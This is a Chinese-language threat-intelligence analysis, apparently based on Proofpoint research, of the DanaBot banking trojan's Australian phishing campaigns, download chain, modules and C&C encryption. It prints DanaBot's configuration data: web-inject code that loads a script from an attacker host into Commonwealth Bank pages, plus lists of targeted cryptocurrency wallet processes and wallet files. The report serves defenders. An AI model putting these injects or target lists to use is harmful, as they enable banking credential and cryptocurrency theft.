2018年的黑客攻击方式已经发生了明显的转变，从过去直接实施大规模的、具有瞬间破坏性的勒索软件活动转变成了如今专注于利用银行木马。在Proofpoint的研究人员目前观察到的电子邮件攻击样本中，银行木马占了将近60％的恶意载荷量。现在，一种新的银行木马——DanaBot已经出现，它直接扩大了电子邮件攻击的数量级，并增加了恶意邮件活动的多样性。

Proofpoint的研究人员发现了一种名为“DanaBot”的新型银行木马病毒，该木马通过包含恶意URL的电子邮件来对澳大利亚的用户发起攻击。DanaBot是用Delphi编写的恶意软件，目前它仍在实验开发阶段。迄今为止，研究人员只观察到一名黑客使用了它。但是，考虑到该黑客经常活跃于黑市，因此最后的传播和使用结果是否会变得广泛还有待观察。研究人员还在恶意软件库中发现了其他样本，而这些样本并不是研究人员在野外观察到的，这就意味着，有其他攻击者使用了DanaBot。

DanaBot的发现过程

研究人员首次在2018年5月6日将DanaBot定性为以澳大利亚为攻击目标的电子邮件攻击活动，并在其中发现了有效载荷。这些邮件使用了“核对收费帐单”的主题，如果用户点开了Word附件里的网址，那就会被重定向到其他网站上，比如hxxp://users[.]tpg[.]com[.]au/angelcorp2001/Account+Statement_Mon752018.doc。

来自2018年5月6日DanaBot活动的电子邮件样本

该Word文档包含一个宏，如果启用的话，它就可以使用来自hxxp://bbc[.]lumpens[.]org/tXBDQjBLvs.php的PowerShell命令来下载DanaBot。该有效载荷只能用于位于澳大利亚的潜在受害者，攻击时，后台服务器将检查客户的IP地理位置。另外，该文档还包含用于社会工程的手段，它在文档的首页会标明自己已经受到某某安全供应商的保护，下图中的品牌被模糊了。

“Account Statement_Mon752018.doc”文档的屏幕截图

DanaBot最近再次出现，则是在5月28日至30日之间，这次，它依然以澳大利亚为攻击目标，且电子邮件活动中还加了很多有效载荷。这些电子邮件使用了许多主题，例如：

· 证书“123456789”

· 文档“123456789”

· Document12345-678

· GT123456789

· 发票和跟踪代码12345678

· 来自John Doe的发票

这一次，电子邮件包含链接到FTP服务器上的压缩JavaScript的URL，包括ftp://kuku1770:[email protected][.]netregistry[.]net/0987346-23764.zip。 JavaScript如果执行，则从 hxxp://members[.]giftera[.]org/whuBcaJpqg.php上下载DanaBot。当然，服务器在下载JavaScript之前，还是要检查了受害者的地理位置。

DanaBot的功能介绍

DanaBot是一个包含银行网站注入和窃取用户金融信息功能的木马，它包含一个下载器组件，该组件用于下载包含主DLL的加密文件。不过，DLL却使用的是原始TCP连接的方式，来连接到端口443并下载其他模块，包括：

· VNCDLL.dll – “VNC”

· StealerDLL.dll – “Stealer”

· ProxyDLL.dll – "Sniffer"

恶意软件还会下载配置文件，例如：

· 嗅探模块的目标站点列表

· 银行网站注入

· 要加密的货币流程和文件列表

最后，它还将文件上传到命令和控制（C＆C）服务器，包括：

· 详细的系统信息

· 用户桌面的屏幕截图

· 用户硬盘上的文件列表

所有上传和下载都使用Microsoft CryptAPI AES256算法加密。

恶意软件分析

目前，恶意软件正在积极开发和测试阶段，目前似乎有两个版本。其中研究人员在5月6日和7日左右的活动中观察到是第一个版本，而第二个版本则在5月29日左右出现。然而，研究人员在对恶意软件库中的数据进行分析时，却发现了更早的样本，出现在4月中旬之前，不过研究人员还没有在野外看到这些样本的利用案例。

下载器组件

下载器组件与C＆C服务器通信，并发送一个初始签入信标，其中包含有关URL参数中编码的关于受感染设备的报告，它发出如下所示的请求：

由旧版本的恶意软件生成的网络请求

新版恶意软件生成的网络请求，其中包含一组扩展的URL参数

在这些网络请求中，“e =”参数是用于使用Microsoft CryptAPI的CryptDeriveKey和CryptDecrypt使用MD5散列和AES算法来解密下一阶段有效载荷的密钥。下表中提供了其他参数的解释：

被感染的客户端向C＆C发送的键-值对的说明

为了响应下载器的初始签入，C＆C服务器会发送下一阶段的DLL。使用RSA算法和以下公钥对DLL进行加密验证：

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDOmbQ1gGQtE8PUhjKIETLaSSEc
JGp9O0gyckoyrIfb4l4BZqLKAkDGm59lUxSFWPCINQOMQvgvDYydMOyMvABtmi4c
0yb4te8dXE0xVxTQmnxGV9pAf3gfcEg3aqBne/7AQmS+0fFUpccX+huz4Sys415+
6lwVPX2A3RA60ToS6wIDAQAB

有效载荷DLL会使用“rundll32.exe”和参数“＃1”来调用，随后，使用参数＃2，＃3等调用它。

主DLL组件

主DLL会使用原始TCP与端口443进行通信。研究人员观察到主DLL组件下载了更多DLL模块，例如VNC，Sniffer和Stealer以及配置文件，所有这些模块都使用Microsoft CryptAPI以类似方式加密。同样，使用不同于上面指出的公钥的RSA算法验证下载：

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCpQbDeOOrFbGOuu989TSd1+sJJ
gi1WFiYV0RInlLkAAv1XZwUodBJRMyNWeKPHg40dn9oseicUScBH3lQb5fRvwm9Q
oppN5DIhiK9au8yzhm6/BGDUuVfK+vDlutanjYLAnz/Wp/W9bofUe5Ej3WZo2w1T
X/KpjiO/gB/+4vf75wIDAQAB

主组件下载的模块

主组件下载的配置文件

研究人员还观察到DanaBot会将文件上传到C＆C，每个文件都使用Deflate算法进行压缩，并使用随机AES密钥进行加密。而密钥本身似乎用一个RSA公钥加密并附加到上传的文件中。然而，解密将需要匹配的RSA私钥，这大概只对恶意软件操作员可用。

DanaBot的主组件上传的文件

以下RSA公钥专门用于系统信息上传，而其他文件的上传则使用与模块下载相同的密钥：

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCilEDyzfbBKas+W2brWstcdKfY
WgAl79oHSmdACo7zVCSkqJPocK3u3naHuFD3rYTTkEQbj6IaTNi1vn6eceNedExE
u3ppOvxzRKqCOUOB+yQbz9Hv8xzsh0QnlJzcuLZHDhCDWoKwMbNU2/AXiVR5w7wF
us8H3Gkr8MQZxt/bEwIDAQAB

在经过深入细致地分析后，第二次发现的DanaBot的下载模块则由一个头部，一个AES加密文件和一个RSA签名组成。例如，研究人员会重点介绍第二次发现的DanaBot中下载的VNC模块。

VNC模块中的hexdump

对下载的模块有效载荷的说明

配置文件

下面提供了一些DanaBot下载的配置文件的值：

*m.adnxs.com/ut/v3*
*.youtube.com*event=streamingstats*
*.youtube.com/api/stats/*
*outlook.live.com/owa/service.svc?action=LogDatapoint&*
*clientservices.googleapis.com*
*clients4.google.com*
*connect.facebook.net/log/*
*.mozilla.org*
*.mozilla.com*
*syndication.twitter.com/*
*cws.conviva.com*
*api.segment.io*
*as-sec.casalemedia.com*
*yunify.chicoryapp.com*
*oauth20_token.srf*
*Exchange/ucwa/oauth/v1/*
*beacons.gcp.gvt2.com*
*.facebook.com*
*.facebook.com/login.php?*
*mc.yandex.ru/webvisor*
*api.logmatic.io/v1/*
*sot3.mavenhut.com*
*erlang.simcase.ru/api/*
*sentry.io/api*
*dsn.algolia.net/1*
*t.urs.microsoft.com*
*.paypal.com/webapps/hermes/api/log*
*.netflix.com*
*s.update.fbsbx.com*
*.youtube.com/youtubei/v1/*
*p.cybertonica.com*
*webmail.subwayadmin.com.au*
*email.telstra.com/webmail/*
*.googleapis.com*
http://*
*outlook.office365.com/owa/service.svc?*
*outlook.office.com/owa/service.svc?*
*outlook.live.com/owa/service.svc?*
*mail.google.com/mail/u/0/*
*.client-channel.google.com*
*bam.nr-data.net*
*browser.pipe.aria.microsoft.com*
*client-s.gateway.messenger.live.com*
*notifications.google.com*
*.google.com/recaptcha/api2/*
*.bing.com*
*.youtube.com*
*bidder.criteo.com*
*.demdex.net/event?*
*insights.hotjar.com/api*
*nexus-long-poller-b.intercom.io*
*.icloud.com/*
*s.acexedge.com*
*s.update.*
*vid-io.springserve.com*
*vuws.westernsydney.edu.au*

嗅探器过滤器列表（旧版本为“PFUrlU”配置文件）以及新版本配置文件（“Pflilter”）在研究人员的测试中仅包含一个“* mozilla *”目标，表明这可能是白名单。

set_url *my.commbank.com.au/netbank* GP
data_before
data_end
data_inject
<script type=text/javascript language=JavaScript src=https:[//]dep.properfunds.org/print?vr=npm%3Fc3%28t%3F2[.]48758295816></script>
data_end
data_after
</html
data_end
data_before
</head>
data_end
data_inject
<div id=mjf230 style=left:0px;top:0px;width:100%;height:100%;background-color:White;position:absolute;z-index:91001;></div>
data_end
data_after
data_end
set_url *my.commbiz.commbank.com.au* GP
data_before
data_end
data_inject
<script type=text/javascript language=JavaScript src=https:[//]dep.properfunds.org/print?vr=npm%3Fc3%28t%3F2[.]487582958161></script>
data_end
data_after
</html
data_end
data_before
</head>
data_end
data_inject
<div id=mjf230 style=left:0px;top:0px;width:100%;height:100%;background-color:White;position:absolute;z-index:91001;></div>
data_end
data_after
data_end

Web注入配置文件（旧版本中为“InjFirst”，新版本中为“PInject”，添加到URL中的括号里）

*-QT*.EXE*
*ETHEREUM*.EXE*
*DECENT.EXE*
*ELECTRON*.EXE*
*ELECTRUM*.EXE*
*ZCASH*.EXE*
*EXPANSE*.EXE*
*SUMOCOIN*.EXE*
*BITCONNECT*.EXE*
*IOTA*.EXE*
*KARBOWANEC.EXE*
*ARKCLIENT.EXE*
*ZCLASSIC*WALLET.EXE*
*PASCALCOINWALLET.EXE*

加密电子货币流程（旧版本中为“BVideo”和“Bkey”配置文件，新版本中为“BitVideo”和“BitKey” 配置文件，将字体进行斜化处理的行为仅出现在旧版本中）

*\WALLETKEYS.DAT*
*\DEFAULT_WALLET*
*\WALLET.DAT*

CryptoCurrency文件（旧版本中为“CFiles”配置文件，新版本中为“BitFiles”;斜体文件仅出现在旧版本中）

Stealer模块

研究人员观察到，目前stealer模块的攻击目标仅仅是Windows Live Mail和Outlook等邮件客户端。另外，它还针对Miranda，Trillian和Digsby等即时通讯工具; FTP客户端，如WS_FTP，FileZilla和SmartFTP，并检查浏览器的历史记录。

针对浏览器信息的Stealer模块

针对FTP客户端的Stealer模块（实际列表要长得多）

总结

正如以上分析的那样，研究人员只观察到DanaBot被一名攻击者使用过，目前该样本已被Proofpoint定义为TA547。然而，这种趋势可能会改变，因为这位攻击者非常有名，在他的作用下，很可能会将DanaBot“发扬光大”。

自2017年11月起，TA547就和许多其他攻击有关联。这些攻击的目标经常是为澳大利亚、德国、英国和意大利等国。其中包括的恶意软件有ZLoader（又名Terdot），Gootkit，Ursnif，Corebot，Panda Banker，Atmos，Mazar Bot和Red Alert Android恶意软件。

值得注意的是，在公共恶意软件存储库中，除了发现于研究人员找到的DanaBot样本，它还包含其他的野外利用活动，该活动含有ID（“a =”参数），这表明研究人员还没有观察到所有的DanaBot活动。

最后，要特别提一下，DanaBot在其技术实现和技术选择方面与早期恶意软件有某些相似之处，特别是和Reveton勒索软件及CryptXXX关联很大，它们也是用Delphi编写的，并使用原始TCP到端口443进行通信。这些恶意软件还在C＆C通信的风格方面具有相似之处。

经过近两年对勒索软件活动的追踪，研究人员发现，攻击者似乎越来越倾向于那些动静较小的恶意软件，如银行木马和信息窃取软件。DanaBot就是恶意软件的最新例子，其重点就在于窃取有用的信息，然后将这些信息进行买卖，而不是像原来那样要求受害者立即支付赎金。到目前为止，研究人员观察到的DanaBot活动中的社交工程的手段设计非常精密，这再次表明采用电子邮件攻击又被黑客重新重视了起来。DanaBot的模块化特性使其能够下载更多组件，从而增加了银行攻击的灵活性、强大的窃取能力以及远程监控能力。

另外，研究人员将继续深入研究这种新型恶意软件，并监控其攻击目标的变化。

IOCs